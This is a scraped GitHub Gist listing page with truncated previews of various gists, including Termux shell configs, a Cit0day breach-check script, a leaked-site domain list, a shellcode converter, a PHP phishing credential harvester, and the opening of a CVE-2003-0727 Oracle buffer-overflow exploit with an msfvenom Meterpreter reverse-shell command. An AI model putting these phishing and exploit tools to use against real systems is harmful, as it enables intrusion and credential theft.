Skip to content

Instantly share code, notes, and snippets.

View SiloGit's full-sized avatar
👁️
OSINT Projects and Resources

Projects by Silo Collective SiloGit

👁️
OSINT Projects and Resources
  • SiloSec
  • Interwebs
View GitHub Profile
@RaWolFoX
RaWolFoX / bash.bashrc
Last active November 12, 2022 06:19
This is My crazy bashrc. If you have any improvements or corrections , let me know. This is for termux android, but it could work on any system with some tweaking. 🙂
shopt -s histappend
shopt -s histverify
shopt -s expand_aliases
shopt -s cdable_vars
#history is set to unlimited. Change accsavedcmdsg to your need. Also
#change history format if you dont it
export HISTCONTROL=ignoreboth:erasedups
@numbnet
numbnet / .bashrc
Last active November 12, 2022 06:19
TERMUX
# ============= .bashrc ============= #
##==================≠==================
## Aliases
##==================≠==================
alias ls="ls -a"
alias rm='rm -rf'
alias cp='cp -i'
alias mv='mv -i'
@numbnet
numbnet / 1.sh
Last active November 12, 2022 06:17
TERMUX Moduls
#!/bin/bash
# https://gist.githubusercontent.com/numbnet/16283d639aa316c8a1925c779dbd225c/raw/e44a093421e9988ffcfee7c43b2da95b5be98b57/1Etap.sh
kastom() {
TITLE = ""
SUBTITLE = "Кастомизации Termux"
NIK.NAME = "NUMBNET"
LastNAME
@j1elo
j1elo / cit0day-breach-check.sh
Created November 19, 2020 12:58
Cit0Day Breach Check
#!/bin/bash
# Step 1: Obtain a list of our personal hosts.
# Export from Bitwarden, LastPass, 1Password, or similar:
my_passwords.txt
# Next commands will assume the LastPass export format, which is CSV with the URL in the first field:
# url,username,password,[... more fields]
@gvolluz
gvolluz / Cit0day.sites.lst
Last active January 4, 2024 22:10
Cit0day breach, list of sites in Cit0day [_special_for_xss.is].txt and Cit0day Prem [_special_for_xss.is].txt (only dns, sorted, without duplicates)
0059.co.kr
007.no
007airsoft.com
008.vista.kz
01186mb.ca
012.ca
01nii.ru
0286776498.com
0286780777.com
02asat.photoherald.com
@mgeeky
mgeeky / bin2shellcode.py
Last active December 17, 2022 15:00
Binary blob to C-array simple converting script. Useful when embedding compiled binary shellcode within C program.
#!/usr/bin/python
# Disasm of 64-bit binary:
# $ objdump -b binary -D -m i386:x86-64 <file>
#
# Usage:
# $ ./bin2shellcode.py <file> num
# Where:
# num - number of bytes to convert into array.
# `num` can be negative, resulting in `size-num`
# bytes be converted.
@mgeeky
mgeeky / memory-occupied-by-process.sh
Last active December 6, 2016 04:22
Bash oneliner counting number of bytes occupied by chosen (by PID) process. It works by iterating /proc/$PID/maps file, then computing each memory region range size, then adding it together. Kinda slow though.
PID=<PID>; BYTES=`IFS=$'\n'; for l in $(cat /proc/$PID/maps | cut -d' ' -f1 | awk -F '-' '{printf "0x%s-0x%s\n", $2, $1}'); do echo $l | ruby -e 'print "#{eval(STDIN.read)}\n"'; done | paste -sd+ - | bc`; echo "Bytes occupied by PID=$PID : $BYTES"
@mgeeky
mgeeky / post.php
Last active December 27, 2023 07:40
(GIST discontinued, for recent version check: https://github.com/mgeeky/PhishingPost ) PHP Credentials Harversting script to be used during Social Engineering Phishing campaigns/projects.
<?php
/*
* PHP Script intdended to be used during Phishing attempts as a harverster
* collector linked to backdoored HTML <form> action parameter. Such action
* parameter could be set like this:
*
* <form [...] action="/post.php" [...]>
*
* and script named as 'post.php' to get it working. Additional further configurations
* can be made in the section below.
@mgeeky
mgeeky / webapplication-heartbeat.sh
Last active July 24, 2022 20:17
WebApplication heartbeat script intended to poll remote web application whether it responds correctly (HTTP 200 OK) or not - thus resulting in Linux GNOME alert being generated. Useful when dealing with unstable webservers or appications behind VPN connection.
#!/bin/bash
#
# Simple script intended to poll remote web application to check whether it is available
# and returns 200 OK. If it is not, then Linux GNOME-related alert will be generated.
#
# Mariusz B., 2016
#
REMOTE_HOST="http://<webapplication>"
@mgeeky
mgeeky / exp2003-0727.py
Last active August 1, 2018 00:40
CVE-2003-0727 Oracle 9i XDB HTTP Server Authentication PASS stack-based buffer overflow
#!/usr/bin/python
import struct
import socket
import base64
import time
HOST = '192.168.0.11:8080'
#
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4448 -e x86/shikata_ga_nai --smallest -f py -v shellcode